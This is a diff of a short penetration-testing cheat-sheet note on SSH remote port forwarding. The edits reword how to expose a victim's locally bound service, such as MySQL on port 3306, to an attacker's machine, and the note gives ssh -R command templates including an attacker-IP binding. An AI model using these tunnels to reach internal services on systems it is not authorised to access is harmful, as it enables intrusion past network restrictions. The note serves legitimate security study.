garffff-bot/garffff-bot.github.io/content/Infrastructure/Tunnelling/SSH Tunnelling.md

 ### From Victim

-This will open a new port on the attacking device from the target.
-If 3306 is open on the target but we don't have access to if we can forward this port over the ssh tunnel.
+This setup creates a new port on the attacker's machine `[target]`, which forwards traffic originating from the victim's machine (`127.0.0.1`).
+If a service (e.g., MySQL on port `3306`) is only accessible locally on the victim (`127.0.0.1:3306`), SSH remote port forwarding can be used to expose it to the attacker's machine.

 ```bash
 ssh -N -R [local_port]:127.0.0.1:[target_port] [user]@[target]
 ```

-or
+or, to restrict access to a specific IP on the attacker's machine:

 ```bash
 ssh -N -R [attacker_ip]:[local_port]:127.0.0.1:[target_port] [user]@[target]